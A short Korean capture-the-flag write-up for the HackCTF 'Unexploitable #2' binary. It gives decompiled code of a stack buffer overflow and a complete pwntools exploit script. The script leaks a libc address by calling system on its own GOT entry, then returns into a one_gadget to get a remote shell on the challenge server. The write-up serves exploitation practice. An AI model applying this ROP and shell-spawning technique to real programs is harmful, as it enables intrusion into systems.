[HackCTF]Unexploitable #2

Trick문제다. system함수 인자로 함수 got 값을 넣게되면 leak이 되면서 오류를 내뿜거 이용하면 된다.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+0h] [rbp-10h]

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  fwrite("Hard RTL ha? You don't even have fflush@dynstr!\n", 1uLL, 0x30uLL, _bss_start);
  fgets(&s, 64, stdin);
  return 0;
}

나 같은경우는 system인자에 system got 넣고 oneshot구해서 main에서 넘겨줬다.

exploit.py

from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'
e = ELF('./Unexploitable_2')
#p = process('./Unexploitable_2')
p = remote('ctf.j0n9hyun.xyz',3029)
libc = e.libc
prdi = 0x0000000000400773 # pop rdi ; ret

payload = '\x90'*0x10
payload += 'realsung'
payload += p64(prdi)
payload += p64(e.got['system'])
payload += p64(e.plt['system'])
payload += p64(e.symbols['main'])

p.sendlineafter('!\n',payload)

p.recvuntil('sh: 1: ')
libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.symbols['system']
log.info('libc_base : ' + hex(libc_base))

payload2 = '\x90'*0x10 + 'realsung' + p64(libc_base + 0xf02a4)
p.sendlineafter('!\n',payload2)
p.interactive()